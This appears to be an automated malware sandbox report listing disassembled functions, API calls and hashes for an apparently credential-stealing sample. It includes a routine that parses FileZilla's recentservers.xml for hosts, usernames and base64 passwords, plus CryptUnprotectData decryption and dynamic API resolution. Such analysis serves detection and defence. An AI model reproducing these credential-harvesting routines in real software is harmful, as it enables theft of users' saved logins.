                                      • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                      • Instruction Fuzzy Hash: 141192B4240208EFEB10CFA4C895BAA77A5EB89B04F208059FD159B390C776A901CB90
                                      APIs
                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                                      • LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                                      • memcpy.MSVCRT(?,?,?), ref: 00409BC6
                                      • LocalFree.KERNEL32(?), ref: 00409BD3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                      • String ID:
                                      • API String ID: 3243516280-0
                                      • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                      • Instruction ID: 8471c3d920f6d21a6ca128c50317bdd839bed9d1cf50ed0ddd6ab59e3c77a746
                                      • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                      • Instruction Fuzzy Hash: 46110CB8A00209EFDB04DF94D985AAE77B6FF89300F104569F915A7390D774AE10CF61
                                      APIs
                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 02309DEB
                                      • LocalAlloc.KERNEL32(00000040,00000000), ref: 02309E0A
                                      • memcpy.MSVCRT(?,?,?), ref: 02309E2D
                                      • LocalFree.KERNEL32(?), ref: 02309E3A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                      • String ID:
                                      • API String ID: 3243516280-0
                                      • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                      • Instruction ID: 32b72697d2d7abc606dac0b1e9f858234f7c96053d747defede7c1b65600ecfb
                                      • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                      • Instruction Fuzzy Hash: 8C11FAB8A00209EFDB04CFA4D989AAE77B5FF89704F108558E91597390D730AE10CF61
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00880DD0,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 00417A63
                                      • HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,00880DD0,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A6A
                                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00880DD0,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A7D
                                      • wsprintfA.USER32 ref: 00417AB7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                      • String ID:
                                      • API String ID: 362916592-0
                                      • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                      • Instruction ID: 8af700d3b0e32b47e9d6ddd9198ddf9a5cfc8e3ba9127fd648bfb7377b14e362
                                      • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                      • Instruction Fuzzy Hash: 461152B1A45228EFEB108B54DC45F9AB7B8FB05711F10439AE516932C0D7785A40CF55
                                      APIs
                                      • CoCreateInstance.COMBASE(0041E118,00000000,00000001,0041E108,00000000), ref: 00413758
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 004137B0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharCreateInstanceMultiWide
                                      • String ID:
                                      • API String ID: 123533781-0
                                      • Opcode ID: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                                      • Instruction ID: 95f6a265596bdc049295610fa53daf8ef9ce5e7415083cbf30a8e52d2e28a0c3
                                      • Opcode Fuzzy Hash: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                                      • Instruction Fuzzy Hash: A941F474A40A28AFDB24DF58CC94BDAB7B5BB48306F4041D9A608A72D0E771AEC5CF50
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: .$GetProcAddress.$l
                                      • API String ID: 0-2784972518
                                      • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                      • Instruction ID: fa588deeac279aa5b2ac551f6a17b4e1be8a4a76ac71a55eafb68fa7526c14a2
                                      • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                      • Instruction Fuzzy Hash: 0F3148B6900609DFDB14CF99C880BAEBBF9FF48324F15404AD841A7251D771EA45CBA4
                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32(Function_0001CEA8), ref: 0041CEEF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • Opcode ID: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                      • Instruction ID: f83a9dfad8d9090bd4b69b445eb29f9fdcf7b9edf99be21673d757649d1b517e
                                      • Opcode Fuzzy Hash: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                      • Instruction Fuzzy Hash: 3B9002753912104A471417755D496C52A905E9D6067624861B506C4054DB988044551A
                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32(0041CEA8), ref: 0231D156
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • Opcode ID: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                      • Instruction ID: f83a9dfad8d9090bd4b69b445eb29f9fdcf7b9edf99be21673d757649d1b517e
                                      • Opcode Fuzzy Hash: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                      • Instruction Fuzzy Hash: 3B9002753912104A471417755D496C52A905E9D6067624861B506C4054DB988044551A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a52d2d04a50fffeb6fba6c6de65239b63d906fa504325b78ba9d4f9799ac93a5
                                      • Instruction ID: d52e9566c2880090428dbeb8f8b514f786f60aa427449febb268cd4ec725b04e
                                      • Opcode Fuzzy Hash: a52d2d04a50fffeb6fba6c6de65239b63d906fa504325b78ba9d4f9799ac93a5
                                      • Instruction Fuzzy Hash: 9AD19571658A5C8FEB19EF28EC896E977E1FB58304B14822ED44BC7251DF34E50ACB81
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: db9edf0eafc9fbe7ebe7b4d5d84250818e1ce01c0a917c1aea8e604f05591d35
                                      • Instruction ID: 1279f1c2496aca32bb8ebaac1b0e935e8a20c401f5fa3a6e7cd31de02cb5b27e
                                      • Opcode Fuzzy Hash: db9edf0eafc9fbe7ebe7b4d5d84250818e1ce01c0a917c1aea8e604f05591d35
                                      • Instruction Fuzzy Hash: 4AA15831518A5C8BEB55EF28DC89AEA77F1FB98305F00862AD84BC7161EF34D545CB81
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2d447741bdc18da4f5f06c2e5f65dda4efe97b355be4cfe625567ad9a4926448
                                      • Instruction ID: b037bf1c83b0fd178ed8d1bc093c3e10b7ca1222cc62d02d7b8cb705a9b05d55
                                      • Opcode Fuzzy Hash: 2d447741bdc18da4f5f06c2e5f65dda4efe97b355be4cfe625567ad9a4926448
                                      • Instruction Fuzzy Hash: 6651F132718E0C4F8B1CDF6CE89867573D2FBAC321715826EE40AD72A5DA74E9468781
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898042742.00000000007F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7f0000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                      • Instruction ID: 04b7bfad5b466851431bad78fd26340eb624bbf461001ba76ea76ae4e7b9c907
                                      • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                      • Instruction Fuzzy Hash: B9117C72340108EFD754DE55DC91EA673EAEB89320B698069EE05CB316E679EC02C760
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                      • Instruction ID: 33eef622e08fab2fdc80e057174f623d5ea5b7af40a8c083c9baf38206a0dcde
                                      • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                      • Instruction Fuzzy Hash: 6D01F7726106008FDF25CF20C954BAA33E5EB85205F0540A6D506972C2E770A941CBA0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                      • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                      • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                      • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                      • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                      • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                      • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: free
                                      • String ID:
                                      • API String ID: 1294909896-0
                                      • Opcode ID: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                      • Instruction ID: 3d06b266c31beca0937256702f9f8c1538b2c0ea0d7a65fac1ee17c0a0b2bb56
                                      • Opcode Fuzzy Hash: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                      • Instruction Fuzzy Hash: 3171C031452E40EBD77A3B31DD11E4AFAA37F04703F104926A1DB29D70DE226869EE51
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                        • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                        • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                        • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                        • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                        • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                        • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                        • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                      • strtok_s.MSVCRT ref: 0041031B
                                      • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 00410362
                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410369
                                      • StrStrA.SHLWAPI(00000000,<Host>), ref: 00410385
                                      • lstrlenA.KERNEL32(00000000), ref: 00410393
                                        • Part of subcall function 004188E0: malloc.MSVCRT ref: 004188E8
                                        • Part of subcall function 004188E0: strncpy.MSVCRT ref: 00418903
                                      • StrStrA.SHLWAPI(00000000,<Port>), ref: 004103CF
                                      • lstrlenA.KERNEL32(00000000), ref: 004103DD
                                      • StrStrA.SHLWAPI(00000000,<User>), ref: 00410419
                                      • lstrlenA.KERNEL32(00000000), ref: 00410427
                                      • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00410463
                                      • lstrlenA.KERNEL32(00000000), ref: 00410475
                                      • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410502
                                      • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041051A
                                      • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00410532
                                      • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041054A
                                      • lstrcatA.KERNEL32(?,browser: FileZilla,?,?,00000000), ref: 00410562
                                      • lstrcatA.KERNEL32(?,profile: null,?,?,00000000), ref: 00410571
                                      • lstrcatA.KERNEL32(?,url: ,?,?,00000000), ref: 00410580
                                      • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410593
                                      • lstrcatA.KERNEL32(?,00421678,?,?,00000000), ref: 004105A2
                                      • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105B5
                                      • lstrcatA.KERNEL32(?,0042167C,?,?,00000000), ref: 004105C4
                                      • lstrcatA.KERNEL32(?,login: ,?,?,00000000), ref: 004105D3
                                      • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105E6
                                      • lstrcatA.KERNEL32(?,00421688,?,?,00000000), ref: 004105F5
                                      • lstrcatA.KERNEL32(?,password: ,?,?,00000000), ref: 00410604
                                      • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410617
                                      • lstrcatA.KERNEL32(?,00421698,?,?,00000000), ref: 00410626
                                      • lstrcatA.KERNEL32(?,0042169C,?,?,00000000), ref: 00410635
                                      • strtok_s.MSVCRT ref: 00410679
                                      • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 0041068E
                                      • memset.MSVCRT ref: 004106DD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                      • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$NA$NA$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                      • API String ID: 337689325-514892060
                                      • Opcode ID: a8872f9b9bb1cb9e478c25673be1377050816f1e4d9c1e82bbed77d0740d0bab
                                      • Instruction ID: d15eb70b6d553ab1cc94bc99ca27928082ec116ada4a7d19c18b432e65637ade
                                      • Opcode Fuzzy Hash: a8872f9b9bb1cb9e478c25673be1377050816f1e4d9c1e82bbed77d0740d0bab
                                      • Instruction Fuzzy Hash: 86D16D75A41208ABCB04FBF1DD86EEE7379FF14314F50441EF102A6091DE78AA96CB69
                                      APIs
                                      • lstrlen.KERNEL32(00424D98), ref: 02304833
                                      • lstrlen.KERNEL32(00424E48), ref: 0230483E
                                      • lstrlen.KERNEL32(00424F10), ref: 02304849
                                      • lstrlen.KERNEL32(00424FC8), ref: 02304854
                                      • lstrlen.KERNEL32(00425070), ref: 0230485F
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 0230486E
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 02304875
                                      • lstrlen.KERNEL32(00425118), ref: 02304883
                                      • lstrlen.KERNEL32(004251C0), ref: 0230488E
                                      • lstrlen.KERNEL32(00425268), ref: 02304899
                                      • lstrlen.KERNEL32(00425310), ref: 023048A4
                                      • lstrlen.KERNEL32(004253B8), ref: 023048AF
                                      • lstrlen.KERNEL32(00425460), ref: 023048C3
                                      • lstrlen.KERNEL32(00425508), ref: 023048CE
                                      • lstrlen.KERNEL32(004255B0), ref: 023048D9
                                      • lstrlen.KERNEL32(00425658), ref: 023048E4
                                      • lstrlen.KERNEL32(00425700), ref: 023048EF
                                      • lstrlen.KERNEL32(004257A8), ref: 02304918
                                      • lstrlen.KERNEL32(00425850), ref: 02304923
                                      • lstrlen.KERNEL32(00425918), ref: 0230492E
                                      • lstrlen.KERNEL32(004259C0), ref: 02304939
                                      • lstrlen.KERNEL32(00425A68), ref: 02304944
                                      • strlen.MSVCRT ref: 02304957
                                      • lstrlen.KERNEL32(00425B10), ref: 0230497F
                                      • lstrlen.KERNEL32(00425BB8), ref: 0230498A
                                      • lstrlen.KERNEL32(00425C60), ref: 02304995
                                      • lstrlen.KERNEL32(00425D08), ref: 023049A0
                                      • lstrlen.KERNEL32(00425DB0), ref: 023049AB
                                      • lstrlen.KERNEL32(00425E58), ref: 023049BB
                                      • lstrlen.KERNEL32(00425F00), ref: 023049C6
                                      • lstrlen.KERNEL32(00425FA8), ref: 023049D1
                                      • lstrlen.KERNEL32(00426050), ref: 023049DC
                                      • lstrlen.KERNEL32(004260F8), ref: 023049E7
                                      • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 02304A03
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                      • String ID:
                                      • API String ID: 2127927946-0
                                      • Opcode ID: 94e7660d446ef400bbca7e6a05bf8504b75a8e0329621672810e0e1d9e7bb62d
                                      • Instruction ID: 8492b85c16501f9c2439b946e2e6b0276eef0f4b3857efee2193211f5b0f50bb
                                      • Opcode Fuzzy Hash: 94e7660d446ef400bbca7e6a05bf8504b75a8e0329621672810e0e1d9e7bb62d
                                      • Instruction Fuzzy Hash: 9E41BC79740624EBC718AFE5EC8DB987F71AB4C712BA0C062FA0295190C7F5D5019B3D
                                      APIs
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 02319B08
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 02319B21
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 02319B39
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 02319B51
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 02319B6A
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 02319B82
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 02319B9A
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 02319BB3
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 02319BCB
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 02319BE3
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 02319BFC
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 02319C14
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 02319C2C
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 02319C45
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A598), ref: 02319C5D
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A224), ref: 02319C75
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A418), ref: 02319C8E
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A634), ref: 02319CA6
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A0BC), ref: 02319CBE
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A12C), ref: 02319CD7
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A2B0), ref: 02319CEF
                                      • LoadLibraryA.KERNEL32(0064A550,?,02316C67), ref: 02319D01
                                      • LoadLibraryA.KERNEL32(0064A17C,?,02316C67), ref: 02319D12
                                      • LoadLibraryA.KERNEL32(0064A104,?,02316C67), ref: 02319D24
                                      • LoadLibraryA.KERNEL32(0064A1DC,?,02316C67), ref: 02319D36
                                      • LoadLibraryA.KERNEL32(0064A328,?,02316C67), ref: 02319D47
                                      • GetProcAddress.KERNEL32(0064A6D4,0064A4AC), ref: 02319D69
                                      • GetProcAddress.KERNEL32(0064A7F4,0064A424), ref: 02319D8A
                                      • GetProcAddress.KERNEL32(0064A7F4,0064A1CC), ref: 02319DA2
                                      • GetProcAddress.KERNEL32(0064A8E4,0064A394), ref: 02319DC4
                                      • GetProcAddress.KERNEL32(0064A7A8,0064A128), ref: 02319DE5
                                      • GetProcAddress.KERNEL32(0064A7D8,0064A414), ref: 02319E06
                                      • GetProcAddress.KERNEL32(0064A7D8,00420724), ref: 02319E1D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad
                                      • String ID:
                                      • API String ID: 2238633743-0
                                      • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
